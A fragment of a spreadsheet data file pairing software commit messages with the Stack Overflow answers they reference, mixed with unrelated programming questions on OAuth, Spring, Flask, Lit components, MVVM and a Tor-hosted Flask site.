I started to plan my next application using this architecture. One of the requirements for the application is to build or change the visual component structure. For example, responding to user interaction I would like to programmatically append an unknown-at-compile-time number of Rectangles and Ellipses to a specific Canvas or Canvases.
I started to twist my mind to apply the MVVM pattern and think where the code responsible for attaching the new components should go. I concluded that it doesn't belong to any of the MVVM layers and therefore it is impossible to apply this architecture in scenarious where you have to manipulate the component tree at runtime.
Is there a way to still use Model-View-ViewModel in these kind of scenarious or it is only limited to work with a fixed View component structure?
</t>
  </si>
  <si>
    <t>C607</t>
  </si>
  <si>
    <t>Add logging of GovDelivery response to mailer (#13789)
Resolves #13627
### Description
  * Updates `SendEmail` to use `deliver_now!` as opposed to `deliver_now`
  * Updates test expectations
  * Adds `return_response` to GovDelivery config settings, and unsets `config.action_mailer.raise_delivery_errors` because `deliver_now!` ignores that flag 
    * `return_response` isn't well documented, but the behavior is described here: https://stackoverflow.com/questions/6374648/actionmailer-smtp-server-response
  * Refactor: Use `"hearings"` app name for Datadog metrics related to virtual hearings.</t>
  </si>
  <si>
    <t>Set return_response: true in the smtp settings and call message.deliver! instead of deliver. This returns the SMTP server response, a Net::SMTP::Response, which contains the server response you're looking for.
If you need a log of all responses from the connection with the server, not just the final result, you'll need to dig into Net::SMTP.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;There is a website on Flask, I'm trying to upload it to the top on .onion, I get a link in hidden_service, but when I click through, it says that this address has not been found, although the tor is connected, it visits all sites, but it cannot access this one.
I tried it on Windows and on ubuntu&lt;/p&gt;
&lt;p&gt;torrc:
&lt;code&gt;HiddenServiceDir C:\Users\markp\Desktop\hidden_service HiddenServicePort 80 127.0.0.1:5000&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;I tried both with and without VPN&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C608</t>
  </si>
  <si>
    <t>fix(gate-oauth-config): use non-reactive spring oauth configuration c
lasses
- probably we can't use the "reactive" variant of the oauth client configuration since we have @EnableWebSecurity in our code (and not @EnableWebFluxSecurity, none of both probably would work as well)
- see https://stackoverflow.com/a/65581128/4222752</t>
  </si>
  <si>
    <t>I ran into the same problem and noticed that the application created a ClientRegistrationRepository instead of a ReactiveClientRegistrationRepository. Somewhere in Spring boot the @EnableWebSecurity was added (we need the @EnableWebFluxSecurity in this case).
To fix the problem I've added the following property:
spring.main.web-application-type: reactive
If you're also using @SpringBootTest to test your application you also need to add the property there.
@SpringBootTest(properties = ["spring.main.web-application-type=reactive]")
or by setting the web environment to NONE
@SpringBootTest(webEnvironment = SpringBootTest.WebEnvironment.NONE)
The reason why this happens is also explained in this answer: https://stackoverflow.com/questions/62558552/error-when-using-enablewebfluxsecurity-in-springboot</t>
  </si>
  <si>
    <t xml:space="preserve">Somehow I've got the feeling that many projects become heavily overengineered so every possible change-request can be tackled with the effect that the change-requests that occured are very hard to implement. 
Somehow I get that feeling in nearly every project I'm currently working on. It is like everyone is thinking "which cool api, framework, etc. can we add to the project to tackle this and that aspect" without evaluating if it is practical or needed.
Does anyone else feel the same or what's the opinion of the community here?
</t>
  </si>
  <si>
    <t>C609</t>
  </si>
  <si>
    <t>Fix Client Type parameter for OAuth applications
* There's a popular stackoverflow questions with a less known answer that properly defines when to use confidential and when to use public: https://stackoverflow.com/a/57762140/12875823
* In essence, you'll always receive a client ID and secret. The difference is in that actual process. We don't want to trade client secret when working on a native application (mobile app, SPA, MPA with vanilla JS, etc.) while we can save these secrets in env variables for confidential type (e.g. CLI usage)</t>
  </si>
  <si>
    <t>HansZ 's answer is a good starting point in that it clarifies the difference between a public and private client application: the ability to keep the client secret a secret.
But it doesn't answer the question: what OAuth2 profile should I use for which use cases? To answer this critical question, we need to dig a bit deeper into the issue.
For confidential applications, the client secret is supplied out of band (OOB), typically by configuration (e.g. in a properties file).  For browser based and mobile applications, there really isn't any opportunity to perform any configuration and, thus, these are considered public applications.
So far, so good.   But I disagree that this makes such apps unable accept or store refresh tokens.   In fact, the redirect URI used by SPAs and mobile apps is typically localhost and, thus, 100% equivalent to receiving the tokens directly from the token server in response to a Resource Owner Password Credentials Grant (ROPC) .
Many writers point out, sometimes correctly, that OAuth2 doesn't actually do Authentication.  In fact, as stated by the OAuth2 RFC 6749, both the ROPC and Client Credentias (CC) grants are required to perform authentication.  See Section 4.3 and Section 4.4.
However, the statement is true for Authorization Code and Implicit grants.  But how does authentication actually work for these domains?
Typically, the user enters her username and password into a browser form, which is posted to the authentication server, which sets a cookie for its domain.  Sorry, but even in 2019, cookies are the state of the authentication art.  Why?  Because cookies are how browser applications maintain state.   There's nothing wrong with them and browser cookie storage is reasonably secure (domain protected, JS apps can't get at "http only" cookies, secure requires TLS/SSL).   Cookies allow login forms to be presented only on the 1st authorization request.  After that, the current identity is re-used (until the session has expired).
Ok, then what is different between the above and ROPC? Not much. The difference is where the login form comes from.  In an SPA, the app is known to be from the TLS/SSL authenticated server.  So this is all-but identical to having the form rendered directly by the server.  Either way, you trust the site via TLS/SSL.  For a mobile app, the form is known to be from the app developer via the app signature (apps from Google Play, Apple Store, etc. are signed).  So, again, there is a trust mechanism similar to TLS/SSL (no better, no worse, depends on the store, CA, trusted root distributions, etc.).
In both scenarios, a token is returned to prevent the application from having to resend the password with every request (which is why HTTP Basic authentication is bad).
In both scenarios, the authentication server MUST be hardened to the onslaught of attacks that any Internet facing login server is subjected.   Authorization servers don't have this problem as much, because they delegate authentication.  However, OAuth2 password and client_credentials profiles both serve as de facto authentication servers and, thus, really need to be tough.
Why would you prefer ROPC over an HTML form?  Non-interactive cases, such as a CLI, are a common use case.  Most CLIs can be considered confidential and, thus, should have both a client_id and client_secret. Note, if running on a shared OS instance, you should write your CLI to pull the client secret and password from a file or, at least, the standard input to avoid secrets and passwords from showing up in process listings!
Native apps and SPAs are another good use, imo, because these apps require tokens to pass to REST services.  However, if these apps require cookies for authentication as well, then you probably want to use the Authorization Code or Implicit flows and delegate authentication to a regular web login server.
Likewise, if users are not authenticated in the same domain as the resource server, you really need to use Authorization Code or Implicit grant types.  It is up to the authorization server how the user must authenticate.
If 2-factor authentication is in use, things get tricky.   I haven't crossed this particular bridge yet myself.  But I have seen cases, like Attlassian, that can use an API key to allow access to accounts that normally require a 2nd factor beyond the password.
Note, even when you host an HTML login page on the server, you need to take care that it is not wrapped either by an IFRAME in the browser or some Webview component in a native application (which may be able to set hooks to see the username and password you type in, which is how password managers work, btw).  But that is another topic falling under "login server hardening", but the answers all involve clients respecting web security conventions and, thus, a certain level of trust in applications.
A couple final thoughts:
If a refresh token is securely delivered to the application, via any flow type, it can be safely stored in the browser/native local storage.  Browsers and mobile devices protect this storage reasonably well.  It is, of course, less secure than storing refresh tokens only in memory. So maybe not for banking applications ... But a great many apps have very long lived sessions (weeks) and this is how it's done.
Do not use client secrets for public apps. It will only give you a false sense of security.  Client secrets are appropriate only when a secure OOB mechanism exists to deliver the secret and it is stored securely (e.g. locked down OS permissions).</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm looking for the fastest way to essentially predict a rotating n values using, effectively, the other n-1 features. I can conceptualize a way of doing this with a for loop and will explain it below. There very well may be a matrix operation I'm unaware of that does this and I just don't know the name for it.&lt;/p&gt;
&lt;p&gt;Say you have a toy dataset:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;# Training Data
users, item1, item2, item3
one  ,   1  ,   2  ,   1
two  ,   1  ,   4  ,   3
thr  ,   1  ,   2  ,   5
# Prediction example
pred ,   x  ,   y  ,   z
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;In this example, I'm trying to predict n=3 classes; n being the number of features. One way I could approach this is by making a traditional feedforward NN with input_size = n and then use a mask.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;toy_data = ... # what you see up there
model = model(input_size=num_of_cols) # traditional Torch NN
for epoch in epochs:
    for col_index in num_of_cols:
        mask_toy_data = mask_col_at_idx(toy_data, col_index)
        # Basically, make prediction without nth col features
        pred = model.forward(mask_toy_data)
        # Loss is only on predictions on nth column
        mask_pred = mask_cols_at_all_other_idx(pred, col_index)
        mask_toy_data_for_loss = mask_cols_at_all_other_ix(toy_data, col_index)
        loss = mask_pred - mask_toy_data_for_loss
        ... # backprop, etc.
 def mask_col_at_idx(data, col_idx):
     # 0 out every value in the column idx
 def mask_cols_at_all_other_idx(data, col_idx):
     # 0 out every other col, besides the given one
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This approach would be totally fine if you only had three columns. But how could I approach this if I have hundreds or thousands? A for loop over each column does not seem feasible.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C61</t>
  </si>
  <si>
    <t>oauthdb: Use flask login and don't require users
https://stackoverflow.com/questions/47643448/flask-dance-cannot-get-oauth-token-without-an-associated-user</t>
  </si>
  <si>
    <t>I want to migrate flask_dance with my application to make the user authorize using google and another social networks.
I am getting this error:
`Cannot get OAuth token without an associated user`
Before i do the connection between the blueprint and sqlalchemy backend, the application worked just fine, if i removed the `google_blueprint.backend` line the error disappear.
Here is my **__init__.py**:
    import os
    from flask import Flask, redirect, url_for, current_app
    from flask_login import current_user
    from develop.models import (
        db,
        User,
        OAuth
    )
    from flask_dance.contrib.google import make_google_blueprint
    from flask_dance.consumer.backend.sqla import SQLAlchemyBackend
    from flask_dance.consumer import oauth_authorized
    from sqlalchemy.orm.exc import NoResultFound
    def create_app(config_object):
        app = Flask(__name__)
        app.config.from_object(config_object)
        db.init_app(app)
        login_manager.init_app(app)
        google_blueprint = make_google_blueprint(
            client_id=app.config['GOOGLE_CLIENT_ID'],
            client_secret=app.config['GOOGLE_CLIENT_SECRET'],
            scope=["profile", "email"]
        )
        app.register_blueprint(google_blueprint, url_prefix='/login')
        @oauth_authorized.connect_via(google_blueprint)
        def google_logged_in(blueprint, token):
            resp = blueprint.session.get("/oauth2/v2/userinfo")
            if resp.ok:
                account_info_json = resp.json()
                email = account_info_json['email']
                query = User.query.filter_by(email=email)
                try:
                    user = query.one()
                except NoResultFound:
                    user = User()
                    user.image = account_info_json['picture']
                    user.fullname = account_info_json['name']
                    user.username = account_info_json['given_name']
                    user.email = account_info_json['email']
                    db.session.add(user)
                    db.session.commit()
                    login_user(get_user, remember=True)
                    identity_changed.send(
                        current_app._get_current_object(),
                        identity=Identity(get_user.id)
                    )
        @login_manager.user_loader
        def load_user(userid):
            return User.query.get(userid)
        google_blueprint.backend = SQLAlchemyBackend(OAuth, db.session, user=current_user)
        return app
Here is also my tables how i organized them in **models.py**:
    class User(db.Model, UserMixin):
        id = db.Column(db.Integer(), primary_key=True)
        image = db.Column(db.String(), nullable=True)
        fullname = db.Column(db.String())
        username = db.Column(db.String(), unique=True)
        password = db.Column(db.String())
        email = db.Column(db.String(), unique=True)
    class OAuth(OAuthConsumerMixin, db.Model):
        user_id = db.Column(db.Integer(), db.ForeignKey(User.id))
        user = db.relationship(User)
Please any help would be appreciated :)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a parent component called &lt;code&gt;ams-card&lt;/code&gt; like below.  Some code removed to keep it short, but full version &lt;a href="https://github.com/greghesp/ha-bambulab-cards/blob/ams-popup/src/cards/ams-card/ams-card.ts" rel="nofollow noreferrer"&gt;here&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Visually, put together it looks like this:
&lt;a href="https://i.sstatic.net/y7QWLl0w.png" rel="nofollow noreferrer"&gt;&lt;img src="https://i.sstatic.net/y7QWLl0w.png" alt="enter image description here" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;When you click on a spool, it opens a modal with more information.  The issue I am having though, is something is triggering it to re-render, which closes the modal.  I'm assuming at this point, its coming from the parent ams-card, but I am a little unsure.&lt;/p&gt;
&lt;p&gt;I have an instance of these where I only render the spool once in its own right, and that never gets closed due to updates, hence why I think perhaps its something to do with the repeating, and maybe some reference clashes or something.  I'm honestly not sure at this point&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;ams-card.ts&lt;/strong&gt;&lt;/p&gt;
&lt;pre class="lang-js prettyprint-override"&gt;&lt;code&gt;@customElement(AMS_CARD_NAME)
export class AMS_CARD extends LitElement {
  // private states
  @state() private _subtitle;
  //etc
  @state() private _isLoading = true;
  @provide({ context: hassContext })
  @state()
  private _hass?;
  @provide({ context: deviceEntitesContext })
  private _deviceEntities: any;
  @provide({ context: infoBarContext })
  private _infoBar: {
    active: boolean;
    title: string;
    sensors: { humidity: any; temperature: any };
  } = {
    active: false,
    title: &amp;quot;&amp;quot;,
    sensors: {
      humidity: null,
      temperature: null,
    },
  };
  config: any;
  set hass(hass) {
    this._hass = hass;
    this._states = hass.states;
    this.fetchDevices();
  }
  private async fetchDevices() {
    this._isLoading = true;
    try {
      await this.filterBambuDevices();
      this._infoBar.sensors = this.returnInfoBarSensors();
    } finally {
      this._isLoading = false;
    }
  }
  setConfig(config) {
    if (!config.ams) {
      throw new Error(&amp;quot;You need to select an AMS&amp;quot;);
    }
    this.config = config;
    this._subtitle = config.subtitle === &amp;quot;&amp;quot; ? nothing : config.subtitle;
    this._deviceEntities = config.entities;
    this._deviceId = config.ams;
    this._style = config.style;
    this._infoBar = {
      active: config.show_info_bar ? true : false,
      title: config.subtitle === &amp;quot;&amp;quot; ? nothing : config.subtitle,
      sensors: {
        humidity: null,
        temperature: null,
      },
    };
    this._showInfoBar = config.show_info_bar ? true : false;
    this._showType = config.show_type ? true : false;
    this._customHumidity = config.custom_humidity === &amp;quot;&amp;quot; ? nothing : config.custom_humidity;
    this._customTemperature =
      config.custom_temperature === &amp;quot;&amp;quot; ? nothing : config.custom_temperature;
  }
  render() {
    if (this._isLoading) return nothing;
      return html` &amp;lt;vector-ams-card .showType=${this._showType} /&amp;gt; `;
  }
  private returnInfoBarSensors() {
    const sensors: { humidity: any; temperature: any } = {
      humidity: null,
      temperature: null,
    };
    //do stuff
    return sensors;
  }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;this returns &lt;code&gt;vector-ams-card&lt;/code&gt; like so:&lt;/p&gt;
&lt;pre class="lang-js prettyprint-override"&gt;&lt;code&gt;  @consume({ context: deviceEntitesContext, subscribe: true })
  private _entities;
  @property() public showType;
  static styles = styles;
  render() {
    return html`
      &amp;lt;ha-card class=&amp;quot;ha-bambulab-vector-ams-card&amp;quot;&amp;gt;
        &amp;lt;div class=&amp;quot;v-wrapper&amp;quot;&amp;gt;
          &amp;lt;info-bar&amp;gt;&amp;lt;/info-bar&amp;gt;
          &amp;lt;div class=&amp;quot;v-ams-container&amp;quot;&amp;gt;
            ${this._entities?.spools?.map(
              (spool: { entity_id: string }) =&amp;gt; html`
                &amp;lt;ha-bambulab-spool
                  .key=&amp;quot;${spool.entity_id}&amp;quot;
                  style=&amp;quot;padding: 0px 5px&amp;quot;
                  .entity_id=&amp;quot;${spool.entity_id}&amp;quot;
                  .show_type=${this.showType}
                &amp;gt;&amp;lt;/ha-bambulab-spool&amp;gt;
              `
            )}
          &amp;lt;/div&amp;gt;
        &amp;lt;/div&amp;gt;
      &amp;lt;/ha-card&amp;gt;
    `;
  }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;which finally calls the spool component and modal here&lt;/p&gt;
&lt;pre class="lang-js prettyprint-override"&gt;&lt;code&gt;import { customElement, property, state } from &amp;quot;lit/decorators.js&amp;quot;;
import { html, LitElement, nothing } from &amp;quot;lit&amp;quot;;
import styles from &amp;quot;./spool.styles&amp;quot;;
import &amp;quot;../dialog/dialog&amp;quot;;
import { getContrastingTextColor } from &amp;quot;../../../utils/helpers&amp;quot;;
import { hassContext } from &amp;quot;../../../utils/context&amp;quot;;
import { consume } from &amp;quot;@lit/context&amp;quot;;
@customElement(&amp;quot;ha-bambulab-spool&amp;quot;)
export class Spool extends LitElement {
  @consume({ context: hassContext, subscribe: true })
  private hass;
  @property({ type: Boolean }) public show_type: boolean = false;
  @property({ type: String }) public entity_id;
  @state() private color;
  @state() private name;
  @state() private active;
  @state() private remaining;
  @state() private tag_uid;
  @state() private state;
  @state() private remainHeight: number = 95;
  @state() private resizeObserver: ResizeObserver | null = null;
  @state() private _dialogOpen: boolean = false;
  static styles = styles;
  connectedCallback() {
    super.connectedCallback();
    this.updateFromHass();
    // Create a bound instance method to avoid creating new functions on each resize
    this._handleResize = this._handleResize.bind(this);
    // Start observing the parent element for size changes
    this.resizeObserver = new ResizeObserver(this._handleResize);
    const rootNode = this.getRootNode() as ShadowRoot;
    const parent = this.parentElement || (rootNode instanceof ShadowRoot ? rootNode.host : null);
    if (parent) {
      this.resizeObserver.observe(parent);
    }
  }
  private _handleResize() {
    // Only update if the component is still connected to the DOM
    if (this.isConnected) {
      this.calculateHeights();
      this.updateLayers();
    }
  }
  disconnectedCallback() {
    super.disconnectedCallback();
    if (this.resizeObserver) {
      this.resizeObserver.disconnect();
      this.resizeObserver = null;
    }
  }
  firstUpdated() {
    this.updateLayers();
  }
  private _handleClick() {
    this._dialogOpen = true;
  }
  private _closeDialog() {
    this._dialogOpen = false;
  }
  render() {
    console.log(&amp;quot;spool component render&amp;quot;);
    return html`
      ${this.modal()}
      &amp;lt;div class=&amp;quot;ha-bambulab-spool-card-container&amp;quot;&amp;gt;
        &amp;lt;div
          class=&amp;quot;ha-bambulab-spool-card-holder&amp;quot;
          style=&amp;quot;border-color: ${this.active
            ? this.hass.states[this.entity_id]?.attributes.color
            : &amp;quot;#808080&amp;quot;}&amp;quot;
          @click=${this._handleClick}
        &amp;gt;
          &amp;lt;div class=&amp;quot;ha-bambulab-spool-container&amp;quot;&amp;gt;
            &amp;lt;div class=&amp;quot;ha-bambulab-spool-side&amp;quot;&amp;gt;&amp;lt;/div&amp;gt;
            &amp;lt;div
              class=&amp;quot;string-roll-container&amp;quot;
              style=&amp;quot;${this.active ? &amp;quot;animation: wiggle 3s linear infinite&amp;quot; : nothing}&amp;quot;
            &amp;gt;
              &amp;lt;div
                class=&amp;quot;v-string-roll&amp;quot;
                id=&amp;quot;v-string-roll&amp;quot;
                style=&amp;quot;background: ${this.hass.states[this.entity_id]?.attributes
                  .color}; height: ${this.remainHeight.toFixed(2)}%&amp;quot;
              &amp;gt;
                ${this.active ? html`&amp;lt;div class=&amp;quot;v-reflection&amp;quot;&amp;gt;&amp;lt;/div&amp;gt;` : nothing}
                ${this.hass.states[this.entity_id]?.attributes?.remain &amp;gt; 0
                  ? html`
                      &amp;lt;div class=&amp;quot;remaining-percent&amp;quot;&amp;gt;
                        &amp;lt;p&amp;gt;${this.hass.states[this.entity_id]?.attributes?.remain}%&amp;lt;/p&amp;gt;
                      &amp;lt;/div&amp;gt;
                    `
                  : nothing}
              &amp;lt;/div&amp;gt;
            &amp;lt;/div&amp;gt;
            &amp;lt;div class=&amp;quot;ha-bambulab-spool-side&amp;quot;&amp;gt;&amp;lt;/div&amp;gt;
          &amp;lt;/div&amp;gt;
        &amp;lt;/div&amp;gt;
        ${this.show_type
          ? html` &amp;lt;div class=&amp;quot;ha-bambulab-spool-info-container&amp;quot;&amp;gt;
              &amp;lt;div class=&amp;quot;ha-bambulab-spool-info-wrapper&amp;quot;&amp;gt;
                &amp;lt;div class=&amp;quot;ha-bambulab-spool-info&amp;quot;&amp;gt;
                  ${this.hass.states[this.entity_id]?.attributes.name}
                &amp;lt;/div&amp;gt;
              &amp;lt;/div&amp;gt;
            &amp;lt;/div&amp;gt;`
          : nothing}
      &amp;lt;/div&amp;gt;
    `;
  }
  modal() {
    if (!this._dialogOpen) return nothing;
    console.log(&amp;quot;spool component modal rendered&amp;quot;);
    return html`
      &amp;lt;ha-dialog
        id=&amp;quot;confirmation-popup&amp;quot;
        .open=${this._dialogOpen}
        @closed=${this._closeDialog}
        heading=&amp;quot;title&amp;quot;
      &amp;gt;
        &amp;lt;ha-dialog-header slot=&amp;quot;heading&amp;quot;&amp;gt;
          &amp;lt;ha-icon-button slot=&amp;quot;navigationIcon&amp;quot; dialogAction=&amp;quot;cancel&amp;quot;
            &amp;gt;&amp;lt;ha-icon icon=&amp;quot;mdi:close&amp;quot;&amp;gt;&amp;lt;/ha-icon
          &amp;gt;&amp;lt;/ha-icon-button&amp;gt;
          &amp;lt;div slot=&amp;quot;title&amp;quot;&amp;gt;${this.hass.states[this.entity_id].attributes.friendly_name}&amp;lt;/div&amp;gt;
        &amp;lt;/ha-dialog-header&amp;gt;
        &amp;lt;div class=&amp;quot;ha-bambulab-spool-modal-container&amp;quot;&amp;gt;
          &amp;lt;div class=&amp;quot;filament-title section-title&amp;quot;&amp;gt;Filament Information&amp;lt;/div&amp;gt;
          &amp;lt;div class=&amp;quot;div2 item-title&amp;quot;&amp;gt;Filament&amp;lt;/div&amp;gt;
          &amp;lt;div class=&amp;quot;div3 item-value&amp;quot;&amp;gt;${this.hass.states[this.entity_id].attributes.name}&amp;lt;/div&amp;gt;
          &amp;lt;div class=&amp;quot;div4 item-value&amp;quot;&amp;gt;
            &amp;lt;span
              style=&amp;quot;background-color: ${this.hass.states[this.entity_id].attributes
                .color}; color: ${getContrastingTextColor(
                this.hass.states[this.entity_id].attributes.color
              )}; padding: 5px 10px; border-radius: 5px;&amp;quot;
              &amp;gt;${this.hass.states[this.entity_id].attributes.color}&amp;lt;/span
            &amp;gt;
          &amp;lt;/div&amp;gt;
          &amp;lt;div class=&amp;quot;div5 item-title&amp;quot;&amp;gt;Color&amp;lt;/div&amp;gt;
          &amp;lt;div class=&amp;quot;div6 section-title&amp;quot;&amp;gt;Nozzle Temperature&amp;lt;/div&amp;gt;
          &amp;lt;div class=&amp;quot;div7 item-title&amp;quot;&amp;gt;Minimum&amp;lt;/div&amp;gt;
          &amp;lt;div class=&amp;quot;div8 item-value&amp;quot;&amp;gt;
            ${this.hass.states[this.entity_id].attributes.nozzle_temp_min}
          &amp;lt;/div&amp;gt;
          &amp;lt;div class=&amp;quot;div9 item-value &amp;quot;&amp;gt;
            ${this.hass.states[this.entity_id].attributes.nozzle_temp_max}
          &amp;lt;/div&amp;gt;
          &amp;lt;div class=&amp;quot;div10 item-title&amp;quot;&amp;gt;Maximum&amp;lt;/div&amp;gt;
          &amp;lt;div class=&amp;quot;action-buttons&amp;quot;&amp;gt;
            &amp;lt;mwc-button class=&amp;quot;action-button&amp;quot; @click=${this._closeDialog}&amp;gt;Load&amp;lt;/mwc-button&amp;gt;
            &amp;lt;mwc-button class=&amp;quot;action-button&amp;quot; @click=${this._closeDialog}&amp;gt;Unload&amp;lt;/mwc-button&amp;gt;
          &amp;lt;/div&amp;gt;
        &amp;lt;/div&amp;gt;
      &amp;lt;/ha-dialog&amp;gt;
    `;
  }
  updateLayers() {
    // Query the #string-roll element inside this component's shadow DOM
    const stringRoll = (this.renderRoot as ShadowRoot).getElementById(&amp;quot;v-string-roll&amp;quot;);
    if (!stringRoll) return;
    const stringWidth = 2; // matches .string-layer width in CSS
    const rollWidth = stringRoll.offsetWidth; // container width
    // Calculate how many lines fit
    const numLayers = Math.floor(rollWidth / (stringWidth * 2)); // 2 = line width + gap
    // Clear previous layers
    const previousLayers = this.renderRoot.querySelectorAll(&amp;quot;.v-string-layer&amp;quot;);
    previousLayers.forEach((layer) =&amp;gt; layer.remove());
    // Add new layers
    for (let i = 0; i &amp;lt; numLayers; i++) {
      const layer = document.createElement(&amp;quot;div&amp;quot;);
      layer.classList.add(&amp;quot;v-string-layer&amp;quot;);
      // Calculate left position = (index + 1) * (width*2) - width
      const leftPosition = (i + 1) * (stringWidth * 2) - stringWidth;
      layer.style.left = `${leftPosition}px`;
      stringRoll.appendChild(layer);
    }
  }
  isAllZeros(str) {
    return /^0+$/.test(str);
  }
  calculateHeights() {
    // Skip calculation if modal is open to prevent unwanted updates
    if (this._dialogOpen) return;
    const maxHeightPercentage = 95;
    const minHeightPercentage = 12;
    // If not a Bambu Spool or remaining is less than 0
    if (
      this.isAllZeros(this.hass.states[this.entity_id]?.attributes.tag_uid) ||
      this.hass.states[this.entity_id]?.attributes?.remain &amp;lt; 0
    ) {
      this.remainHeight = maxHeightPercentage;
    } else {
      // Get the container's height
      const container = this.renderRoot.querySelector(
        &amp;quot;.string-roll-container&amp;quot;
      ) as HTMLElement | null;
      const containerHeight = container?.offsetHeight || 0;
      // Calculate heights in pixels
      const maxHeightPx = containerHeight * (maxHeightPercentage / 100);
      const minHeightPx = containerHeight * (minHeightPercentage / 100);
      // Calculate remain height based on the remain percentage
      const remainPercentage = Math.min(
        Math.max(this.hass.states[this.entity_id]?.attributes?.remain, 0),
        100
      );
      this.remainHeight = minHeightPx + (maxHeightPx - minHeightPx) * (remainPercentage / 100);
      // Convert back to percentage of container
      this.remainHeight = (this.remainHeight / containerHeight) * 100;
    }
    // Ensure remainHeight is always a number and doesn't exceed maxHeightPercentage
    this.remainHeight = Math.min(
      Number(this.remainHeight) || maxHeightPercentage,
      maxHeightPercentage
    );
    this.requestUpdate();
  }
  // Add willUpdate lifecycle method to handle hass changes
  willUpdate(changedProperties) {
    if (changedProperties.has(&amp;quot;hass&amp;quot;)) {
      // Skip the update if dialog is open to prevent unwanted re-renders
      if (!this._dialogOpen) {
        this.updateFromHass();
      }
    }
  }
  // New method to handle state updates
  private updateFromHass() {
    if (!this.hass || !this.entity_id) return;
    console.log(&amp;quot;updateFromHass&amp;quot;);
    const newActive =
      this.hass.states[this.entity_id]?.attributes.active ||
      this.hass.states[this.entity_id]?.attributes.in_use
        ? true
        : false;
    // Only update if the active state has changed
    if (this.active !== newActive) {
      this.active = newActive;
      // Only recalculate heights if dialog is not open
      if (!this._dialogOpen) {
        this.calculateHeights();
      }
    }
  }
}
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>C610</t>
  </si>
  <si>
    <t>For using Telegram authentication, set port 80.
Create and set  up telegram Bot. You will need BotFather and widget. https://core.telegram.org/widgets/login
Good manul for set up google oauth on localhost:
https://stackoverflow.com/questions/24352975/passport-google-oauth-on-localhost</t>
  </si>
  <si>
    <t>Currently OAUTH2 protocol for authentication and autherization is well supported by google.So Its better to use the same .
Here is
google's documentation on it .Use
'passport-google-oauth'
module . Here is the implementation.This should be the app objects configuration , also see that oauth2strategy object is used from passport-google-oauth module , also check out the scopes in the app.get route registration .
var googleStrategy = require('passport-google-oauth').OAuth2Strategy;
  app.configure(function() {
    app.set('views',  './views');
    app.set('view engine', 'jade');
    app.use(express.favicon());
    app.use(express.logger('dev'));
    app.use(express.cookieParser());
    app.use(express.bodyParser());
    app.use(express.session({secret:'MySecret'}));
    app.use(passport.initialize());
    app.use(passport.session());
    app.use(express.methodOverride());
    app.use(app.router);
    app.use(express.static('./public'));
});
app.get('/auth/google', select.passport.authenticate('google',{scope: 'https://www.googleapis.com/auth/plus.me https://www.google.com/m8/feeds https://www.googleapis.com/auth/userinfo.email https://www.googleapis.com/auth/userinfo.profile'}));
app.get('/auth/google/callback', function() {
    passport.authenticate('google', {
        successRedirect: '/profile',
        failureRedirect: '/fail'
    });
});
app.get('/logout', function (req, res) {
        req.logOut();
        res.redirect('/');
    });
But before creating a new strategy go to googles developer console and get clientID and secret . Here are the steps
go this
link
and create project , here is the snapshot of the same
give a new project name and ID , here is the snapshot
It'll roughly take a minute to create your new project , once your new project is created it'll redirect you to the application configuration of your app . In the redirected page select
APIS AND AUTH
-&gt;
API's
, In the API's page enable the GOogle+ API , here is the snapshot of it
then go to credentials(below APIs), then click on
Create New Client Id
, and register the domains and callback for your app(configure the domain to be localhost ) , here is its snapshot !
5.Then u'll get your new ID and secret . Use them to create the new Strategy
passport.use(new googleStrategy({
    clientID: '&lt;TheNewclientID&gt;',
    clientSecret: '&lt;The New Secret&gt;',
    callbackURL: "http://locahost:8080/auth/google/callback"
},
function (accessToken, refreshToken, profile, done) {
    console.log(profile); //profile contains all the personal data returned 
    done(null, profile)
}
));
6.now serialize and deserialize
passport.serializeUser(function(user, callback){
        console.log('serializing user.');
        callback(null, user.id);
    });
passport.deserializeUser(function(user, callback){
       console.log('deserialize user.');
       callback(null, user.id);
    });
run the server and go to localhost:8080/auth/google (dont use 127.0.0.1:8080 instead of locahost ) .This should be getting it working :)
[Other useful links: 
Check out the first comment by kvcrawford on the repo of the module in
this
page
Passport-google is another popular module which is use to provide login using google , its kind of outdated now , here is the
link
with respect to its recent issues ]</t>
  </si>
  <si>
    <t xml:space="preserve">Do you try to keep it simple and have a root folder and then 1 folder for images, javascript, flash, etc?  What do you normally call your folders?  Do you give your files naming conventions?
</t>
  </si>
  <si>
    <t>C611</t>
  </si>
  <si>
    <t>Authentication/Authorization: fix header name (#2096)
Rationale: OAuth is about Authorization, Authentication is part of
the flow and the Header right name (and works) is Authorization
References: https://tools.ietf.org/html/rfc6749#section-3.1,
https://stackoverflow.com/a/33704657</t>
  </si>
  <si>
    <t>OAuth is a specification for authorization
OAuth 2.0 is a specification for authorization, but NOT for authentication. RFC 6749,
3.1. Authorization Endpoint
explicitly says as follows:
The authorization endpoint is used to interact with the resource owner
and obtain an authorization grant. The authorization server MUST first
verify the identity of the resource owner. The way in which the
authorization server authenticates the resource owner (e.g., username
and password login, session cookies) is
beyond the scope of this
specification
.
OAuth authentication?
Authentication deals information about "who one is". Authorization deals information about "who grants what permissions to whom". Authorization flow contains authentication as its first step. It is the reason people are often confused.
There are many libraries and services that use OAuth 2.0 for authentication. It is often called "social login" and It makes people more confused. If you see "OAuth authentication" (not "OAuth authorization"), it is a solution using OAuth for authentication.
OpenID Connect
OpenID 1.0 and OpenID 2.0 are old specifications for authentication. Those who made the specifications expected people to use OpenID for authentication. However, some people began to use OAuth 2.0 for authentication (not for authorization) and OAuth authentication has prevailed rapidly.
From a viewpoint of OpenID guys, authentication based on OAuth was not secure enough, but they had to admit that people preferred OAuth authentication. As a result, OpenID guys decided to define a new specification,
OpenID Connect
, on top of OAuth 2.0.
Yes, this has made people much more confused.
